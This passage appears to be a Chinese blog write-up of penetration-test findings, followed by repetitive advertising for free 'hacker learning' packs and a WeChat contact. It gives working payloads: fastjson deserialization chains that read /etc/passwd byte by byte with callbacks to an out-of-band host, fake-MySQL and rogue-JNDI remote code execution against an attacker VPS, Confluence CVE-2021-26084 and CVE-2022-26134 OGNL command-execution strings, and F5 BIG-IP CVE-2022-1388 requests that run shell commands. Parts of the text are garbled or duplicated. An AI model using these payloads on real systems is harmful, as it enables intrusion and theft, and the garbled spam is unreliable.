"delegate": {
"@type": "org.apache.commons.io.input.ReaderInputStream",
"reader": {
"@type": "jdk.nashorn.api.scripting.URLReader",
"url": "file:///etc/passwd"
},
"charsetName": "UTF-8",
"bufferSize": 1024
},"boms": \[
{
"@type": "org.apache.commons.io.ByteOrderMark",
"charsetName": "UTF-8",
"bytes": \[114,
]
}
]
},
“address”: {
“@type”: “java.lang.AutoCloseable”,
“@type”: “org.apache.commons.io.input.BOMInputStream”,
“delegate”: {
“@type”: “org.apache.commons.io.input.ReaderInputStream”,
“reader”: {
“@type”: “jdk.nashorn.api.scripting.URLReader”,
“url”: “http://xxxx.oastify.com/”
},
“charsetName”: “UTF-8”,
“bufferSize”: 1024
},
“boms”: [{“
r
e
f
"
:
"
ref":"
ref":".abc.BOM[0]”}]
},
“xxx”:{“
r
e
f
"
:
"
ref":"
ref":".address.BOM[0]”}
}
114对应/etc/passwd第一行第一个字节r的ascii码,当字节序列匹配时,dnslog上会收到请求:
当字节序列不匹配时,dnslog上接收不到请求:
尝试读取/etc/passwd的第一行,匹配的字节序列为:
“bytes”:[114,111,111,116,58,120,58,48,58,48,58,114,111,111,116,58,47,114,111,111,116,58,47,98,105,110,47,97,115,104,]:
即读取到/etc/passwd第一行为:
root❌0:0:root:/root:/bin/ash
###### 2.管理后台存在fastjson反序列任意文件读取(类似布尔盲注)
payload如下:
{“abc”:{“@type”:“java.lang.AutoCloseable”,“@type”:“org.apache.commons.io.input.BOMInputStream”,“delegate”:{“@type”:“org.apache.commons.io.input.ReaderInputStream”,“reader”:{“@type”:“jdk.nashorn.api.scripting.URLReader”,“url”:“file:///etc/passwd”},“charsetName”:“UTF-8”,“bufferSize”:1024},“boms”:[{“@type”:“org.apache.commons.io.ByteOrderMark”,“charsetName”:“UTF-8”,“bytes”:[114]}]},“address”:{“@type”:“java.lang.AutoCloseable”,“@type”:“org.apache.commons.io.input.CharSequenceReader”,“charSequence”:{“@type”:“java.lang.String”{“ r e f " : " ref":" ref":".abc.BOM[0]”},“start”:0,“end”:0}}
114对应/etc/passwd第一行第一个字节r的ascii码,当字节序列匹配时,服务器返回状态为500:
不匹配则返回200:
尝试读取/etc/passwd文件的第一行,匹配的字节序列为:
“bytes”:[114,111,111,116,58,120,58,48,58,48,58,114,111,111,116,58,47,114,111,111,116,58,47,98,105,110,47,97,115,104,]:
即读取到/etc/passwd第一行为:
root❌0:0:root:/root:/bin/ash
有关fastjson反序列化读取文件可参考:
[https://mp.weixin.qq.com/s/esjHYVm5aCJfkT6I1D0uTQ]( )
https://tyskill.github.io/posts/fastjson%E6%97%A0%E5%9B%9E%E6%98%BE%E8%AF%BB%E6%96%87%E4%BB%B6/
###### 3.微信小程序fastjson反序列化远程代码执行漏洞(fake mysql利用)
微信小程序请求的domain2.target.com域名下的三个接口存在反序列化RCE漏洞:
服务端启动一个fake mysql:
Burp中发送如下payload,让目标机器向目标域名xxxx.oastify.com发起一次DNS请求:
{“x”:{“@type”:“java.lang.AutoCloseable”,“@type”:“com.mysql.jdbc.JDBC4Connection”,“hostToConnectTo”:“vps_ip”,“portToConnectTo”:3306,“info”:{“user”:“yso_URLDNS_http://xxx.oastify.com”,“password”:“ubuntu”,“useSSL”:“false”,“statementInterceptors”:“com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor”,“autoDeserialize”:“true”},“databaseToConnectTo”:“mysql”,“url”:“”}}
发送后,fake mysql服务器上接收到目标请求,并将payload返回给目标机器,让目标机器执行:
过几秒后,r7zfjbp3hnp749lu4slz9rygr7xxlm.oastify.com接收到dns查询请求:
fake mysql利用难的是找到一条利用链getshell,此处试了ysoserial中的所有链子,并没有找到一条利用链子。关于fastjson RCE的fake mysql利用方式可参考:
https://github.com/dushixiang/evil-mysql-server
https://github.com/fnmsd/MySQL\_Fake\_Server
###### 4.某后台存在fastjson反序列化远程代码执行漏洞(JNDI注入高版本绕过)
项目地址:https://github.com/veracode-research/rogue-jndi
Vps上启动一个ldap服务:
Burp中发送如下payload:
{“name”:{“\u0040\u0074\u0079\u0070\u0065”:“\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073”,“\u0076\u0061\u006c”:“\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c”},“x”:{“\u0040\u0074\u0079\u0070\u0065”:“\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c”,“\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065”:“ldap://x.x.x.x:2389/o=tomcat”,“autoCommit”:true}}
Dnslog上收到请求,且whoami被执行,权限为root:
关于JNDI注入高版本绕过可参考:
https://blog.csdn.net/mole\_exp/article/details/121141042
https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html
###### 5.内网Confluence存在CVE-2021-26084和CVE-2022-26134远程代码执行漏洞
###### (1)CVE-2021-26084
CVE-2021-26084即是Atlassian Confluence OGNL表达式注入代码执行漏洞,版本小于7.13.0,有多个接口存在这个OGNL表达式注入漏洞,重点关注以下三个路径:
在无需登录的情况下,访问/pages/doenterpagevariables.action或/pages/createpage-entervariables.action,如果存在,说明存在该漏洞。
在登录状态下(需要是管理员或有权限访问/admin/console.action),访问/pages/createpage.action,也可进行漏洞利用。
payload:
queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
Burp中发送如下数据包:
可以看到命令被执行,权限为root:
###### (2) CVE-2022-26134
Confluence OGNL 注入漏洞,查看返回数据包X-Cmd-Response字段内容
payload:
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
Burp中发送payload,获取服务器root权限:
Confluence漏洞合集:
https://www.dianjilingqu.com/504336.html
##### 五、某企业内网F5-BIG-IP 远程代码执行漏洞(CVE-2022-1388)
该漏洞允许未授权的攻击者通过接口对BIG-IP系统访问,并能执行任意系统命令、创建、删除文件以及关闭服务
payload1:
POST /mgmt/tm/util/bash HTTP/1.1
Host: ip:port
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0
{“command”: “run” , “utilCmdArgs”: " -c ‘id’ " }
payload2:
POST /mgmt/tm/util/bash HTTP/1.1
Host:ip:port
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0
{“command”: “run” , “utilCmdArgs”: " -c ’ cat /etc/passwd’ " }
参考:
https://forum.butian.net/share/1567
至于内网中常见的弱口令,docker-api未授权,Nacos默认口令/未授权认证绕过,Spring actuator未授权访问等这些漏洞就不用说了。
##### 0x02 总结
1.作为三流安全工程师,脚本小子,渗透嘛,就是拿着别人写的脚本、工具去扫描、去攻击,梭哈是艺术,找到洞是运气,找不到洞是常事。getshell了感觉自己又行了。
2.找不到洞又得写报告,什么中间件版本信息泄漏、用户名枚举、明文传输、jquery版本存在xss、x-frame-options报头缺失点击劫持啥的写上。
3.做水水的事,写水水的报告是工作常态。
**黑客&网络安全如何学习**
**今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。**
#### **1.学习路线图**
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
#### **2.视频教程**
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
****************************************************************************************************************************************************************************************************************************************************************[CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]( )****************************************************************************************************************************************************************************************************************************************************************
#### **3.技术文档和电子书**
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
****************************************************************************************************************************************************************************************************************************************************************[CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]( )****************************************************************************************************************************************************************************************************************************************************************
#### **4.工具包、面试题和源码**
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
****************************************************************************************************************************************************************************************************************************************************************[CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]( )****************************************************************************************************************************************************************************************************************************************************************
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
***93道网络安全面试题***
内容实在太多,不一一截图了
### 黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
#### 1️⃣零基础入门
##### ① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
##### ② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
##### ② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中...(img-2C0OLC7e-1713045008602)]
2518
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
